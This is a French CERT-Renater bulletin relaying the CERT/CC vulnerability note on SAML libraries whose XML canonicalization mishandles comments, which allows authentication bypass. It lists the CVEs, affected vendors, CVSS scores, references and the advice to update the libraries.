====================================================================

                             CERT-Renater

                 Note d'Information No. 2018/VULN083
_____________________________________________________________________

DATE                : 28/02/2018

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running SAML libraries.

=====================================================================
https://www.kb.cert.org/vuls/id/475445
_____________________________________________________________________


Vulnerability Note VU#475445

Multiple SAML libraries may allow authentication bypass via incorrect
XML canonicalization and DOM traversal

Original Release date: 27 Feb 2018 | Last revised: 27 Feb 2018


Overview

Multiple SAML libraries may incorrectly utilize the results of XML DOM
traversal and canonicalization APIs in such a way that an attacker may
be able to manipulate the SAML data without invalidating the
cryptographic signature, allowing the attack to potentially bypass
authentication to SAML service providers.


Description

CWE-287: Improper Authentication

Security Assertion Markup Language (SAML) is an XML-based markup
language for security assertions regarding authentication and
permissions, most commonly used for single sign-on (SSO) services.

Some XML DOM traversal and canonicalization APIs may be inconsistent in
handling of comments within XML nodes. Incorrect use of these APIs by
some SAML libraries results in incorrect parsing of the inner text of
XML nodes such that any inner text after the comment is lost prior to
cryptographically signing the SAML message. Text after the comment
therefore has no impact on the signature on the SAML message.

A remote attacker can modify SAML content for a SAML service provider
without invalidating the cryptographic signature, which may allow
attackers to bypass primary authentication for the affected SAML
service provider

The following CVEs are assigned:

CVE-2017-11427 - OneLogin's "python-saml"
CVE-2017-11428 - OneLogin's "ruby-saml"
CVE-2017-11429 - Clever's "saml2-js"
CVE-2017-11430 - "OmniAuth-SAML"
CVE-2018-0489 - Shibboleth openSAML C++

More information is available in the researcher's blog post.


Impact

By modifying SAML content without invalidating the cryptographic
signature, a remote, unauthenticated attacker may be able to bypass
primary authentication for an affected SAML service provider.


Solution

Apply updates

Affected SAML service providers should update software to utilize the
latest releases of affected SAML libraries. Please see the vendor list
below for more information.


Vendor Information (Learn More)

    Vendor                     Status        Date     Date Updated
                                                        Notified
Clever, Inc.                   Affected     24 Jan 2018  26 Feb 2018
Duo Security                   Affected     -            22 Feb 2018
OmniAuth                       Affected     24 Jan 2018  06 Feb 2018
OneLogin Inc                   Affected     24 Jan 2018  27 Feb 2018
Shibboleth Consortium          Affected     24 Jan 2018  06 Feb 2018
AssureBridge                   Not Affected -            27 Feb 2018
Okta Inc.                      Not Affected 29 Jan 2018  27 Feb 2018
Box                            Unknown      23 Feb 2018  23 Feb 2018
Cisco                          Unknown      23 Feb 2018  23 Feb 2018
Danish e-Infrastructure
Cooperation                    Unknown      24 Jan 2018  24 Jan 2018
(WAYF)
Entr'ouvert                    Unknown      24 Jan 2018  24 Jan 2018
GitHub                         Unknown      24 Jan 2018  24 Jan 2018
Google                         Unknown      23 Feb 2018  23 Feb 2018
Microsoft                      Unknown      23 Feb 2018  23 Feb 2018
Pivotal Software, Inc.         Unknown      24 Jan 2018  24 Jan 2018

If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

    Group     Score             Vector
Base          6.3   AV:N/AC:M/Au:S/C:C/I:N/A:N
Temporal      4.9   E:POC/RL:OF/RC:C
Environmental 4.9   CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

  * https://duo.com/blog/
    duo-finds-saml-vulnerabilities-affecting-multiple-implementations
  * https://duo.com/labs/psa/duo-psa-2017-003
  * https://shibboleth.net/community/advisories/secadv_20180112.txt
  * https://cwe.mitre.org/data/definitions/287.html

Credit

Thanks to Kelby Ludwig of Duo Security for reporting this vulnerability.

This document was written by Garret Wassermann.

Other Information

  * CVE IDs: CVE-2017-11427 CVE-2017-11428 CVE-2017-11429 CVE-2017-11430
    CVE-2018-0489
  * Date Public: 27 Feb 2018
  * Date First Published: 27 Feb 2018
  * Date Last Updated: 27 Feb 2018
  * Document Revision: 67


==========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44           +
+ 23 - 25 Rue Daviel    | fax : 01-53-94-20-41           +
+ 75013 Paris           | email: cert@support.renater.fr +
==========================================================